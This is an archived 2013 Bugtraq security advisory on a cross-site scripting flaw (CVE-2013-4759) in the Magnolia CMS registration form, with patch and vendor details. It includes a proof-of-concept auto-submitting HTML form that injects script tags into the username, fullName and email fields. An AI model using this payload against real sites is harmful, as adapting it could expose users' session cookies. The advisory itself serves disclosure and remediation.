lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 24 Jul 2013 13:00:07 +0200 (CEST)
From: advisory@...ridge.com
To: bugtraq@...urityfocus.com
Subject: Cross-Site Scripting (XSS) in Magnolia CMS

Advisory ID: HTB23163
Product: Magnolia CMS
Vendor: Magnolia International Ltd
Vulnerable Version(s): 4.5.7, 4.5.8, 4.5.9, 5.0 and 5.0.1 Community Edition
Tested Version:  5.0 Community Edition
Vendor Notification: July 3, 2013 
Vendor Patch: July 18, 2013 
Public Disclosure: July 24, 2013 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2013-4759
Risk Level: Medium 
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered XSS vulnerability in Magnolia CMS, which can be exploited to perform Cross-Site Scripting attacks against users of vulnerable application.


1) Cross-Site Scripting (XSS) in Magnolia CMS: CVE-2013-4759

The vulnerability exists due to insufficient sanitisation of user-supplied data in "username", "fullname" and "email" HTTP POST parameters passed to "/magnoliaPublic/demo-project/members-area/registration.html" URL.

A remote attacker can trick victim to open a specially crafted link and execute arbitrary HTML and scripting code in his browser in context of the vulnerable website.

The exploitation example below uses the "alert()" JavaScript function to display user's cookies:


<form action="http://[host]/magnoliaPublic/demo-project/members-area/registration.html" method="post" name="main">
<input type="hidden" name="mgnlModelExecutionUUID"  value="8417fe0e-8f61-4d21-bdf1-c9c23b13ba14">
<input type="hidden" name="password"  value='password'>
<input type="hidden" name="passwordConfirmation"  value='password'>
<input type="hidden" name="username"  value='"><script>alert(document.cookie);</script>'>
<input type="hidden" name="fullName"  value='"><script>alert(document.cookie);</script>'>
<input type="hidden" name="email"  value='"><script>alert(document.cookie);</script>'>
<input type="submit" id="btn">
</form>
<script>
document.main.submit();
</script>


-----------------------------------------------------------------------------------------------

Solution:

The vulnerability and fix are described in the MGNLFORM-183 issue (1). 

The hot fix for the vulnerability have been distributed to all clients and fix has been also made publicly available in Magnolia Form module version 1.4.7 (for Magnolia 4.5.x branch) and 2.0.2 (for Magnolia 5.x branch). Anyone using affected version of Magnolia can download and update their installation of Magnolia with above mentioned version of Form module from (2) and (3) respectively:

(1) http://jira.magnolia-cms.com/browse/MGNLFORM-183
(2) http://nexus.magnolia-cms.com/content/repositories/magnolia.public.releases/info/magnolia/magnolia-module-form/1.4.7/
(3) http://nexus.magnolia-cms.com/content/repositories/magnolia.public.releases/info/magnolia/magnolia-module-form/2.0.2/

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23163 - https://www.htbridge.com/advisory/HTB23163 - Cross-Site Scripting (XSS) in Magnolia CMS.
[2] Magnolia CMS - http://www.magnolia-cms.com/ - Magnolia CMS is an open source Java content management system for the enterprise.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. 

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ